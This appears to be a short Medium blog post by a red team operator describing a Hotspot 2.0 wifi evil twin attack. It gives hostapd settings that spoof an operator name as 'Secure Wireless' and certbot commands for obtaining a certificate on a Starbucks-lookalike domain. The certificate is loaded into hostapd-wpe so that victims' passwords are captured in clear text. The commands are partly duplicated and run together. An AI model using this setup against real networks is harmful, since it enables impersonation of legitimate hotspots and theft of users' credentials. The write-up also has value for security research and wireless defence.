New Hot Spot 2.0 Wifi Evil Twin Attack

############################################################## Enable Hotspot 2.0 support
#############################################################
hs20=1

# Operator Friendly Name
This parameter can be used to configure one or more Operator Friendly Name Duples. Each entry has a two or three character language code (ISO-639) separated by colon from the operator friendly name string.-- snip --hs20_oper_friendly_name=eng:Secure Wireless

The very nature of wireless is insecure. We take a leap of faith when we click on wireless network name. If one says “Secure” and the other doesn’t — what would you choose?

Spoofed Hot Spot 2.0 “Secure Wireless Operator Friendly Name”
Free Let’s Encrypt Certificate
Clear text password
# apt-get install certbot# certbot — apache -d starbucks.”yourdomain” — register-unsafely-without-email# scp server:/etc/letsencrypt/live/starbucks.”yourdomain”./*.pem# apt-get install certbot# certbot — apache -d starbucks.”yourdomain” — register-unsafely-without-email# scp server:/etc/letsencrypt/live/starbucks.”yourdomain”./*.pem# ls cert.pem chain.pem fullchain.pem privkey.pem (Copy these to the machine you’re using for hostapd)— SNIP —hostapd.confca_cert=/root/files/cert.pem
server_cert=/root/files/fullchain.pem
private_key=/root/files/privkey.pem
* Don’t have to use the file — “chain.pem”, for Radius *
Certs from Lets Encrypt above in hostapd-wpe.conf

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adam Toscher

Adam Toscher

Adam is a offensive security engineer and red team operator with over 20 years of experience in IT